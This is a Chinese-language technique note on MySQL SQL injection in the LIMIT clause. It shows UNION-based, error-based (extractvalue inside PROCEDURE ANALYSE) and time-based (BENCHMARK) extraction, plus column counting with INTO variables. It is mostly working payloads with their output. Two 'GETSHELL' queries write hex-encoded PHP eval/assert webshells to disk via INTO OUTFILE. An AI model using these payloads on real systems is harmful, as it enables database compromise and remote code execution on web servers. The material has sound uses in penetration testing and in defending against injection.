0x01 无order by


可以使用union select,例如:

mysql> SELECT 1 from mysql.user limit 0,1 union select 234;
+-----+
| 1 |
+-----+
| 1 |
| 234 |
+-----+
2 rows in set (0.00 sec)

GETSHELL:

mysql> SELECT 1 from mysql.user limit 0,1 union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e from mysql.user into outfile '/tmp/z.php';
Query OK, 2 rows affected (0.00 sec)

0x02 有order by


UNION语句不能在ORDER BY的后面,如下所示:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 union select 234;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

我们可以使用PROCEDURE ANALYSE,通过分析select查询结果对现有的表的每一列给出优化的建议。

支持报错

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 
ERROR 1105 (HY000): XPATH syntax error: ':5.1.73-log'

不支持报错,用time-based

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(50000000,SHA1(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

注意这里不能用sleep而只能用benchmark。

GETSHELL:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E;
Query OK, 1 row affected (0.00 sec)

0x03 获取列数


我们看下Limit后还可以接什么

SELECT 
[ALL | DISTINCT | DISTINCTROW ] 
  [HIGH_PRIORITY] 
  [STRAIGHT_JOIN] 
  [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
  [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
select_expr [, select_expr ...] 
[FROM table_references 
[WHERE where_condition] 
[GROUP BY {col_name | expr | position} 
  [ASC | DESC], ... [WITH ROLLUP]] 
[HAVING where_condition] 
[ORDER BY {col_name | expr | position} 
  [ASC | DESC], ...] 
[LIMIT {[offset,] row_count | row_count OFFSET offset}] 
[PROCEDURE procedure_name(argument_list)] 
[INTO OUTFILE 'file_name' export_options 
  | INTO DUMPFILE 'file_name' 
  | INTO var_name [, var_name]] 
[FOR UPDATE | LOCK IN SHARE MODE]]

这里发现可以INTO var_name [, var_name] 所以我们可以利用这个造成报错,用于发现注入点的存在,并且可以获取到列数,利用方式如下:

mysql> select * from vinc order by id limit 1 into @,@;
Query OK, 1 row affected (0.00 sec)

mysql> select * from vinc order by id limit 1 into @,@,@;
ERROR 1222 (21000): The used SELECT statements have a different number of columns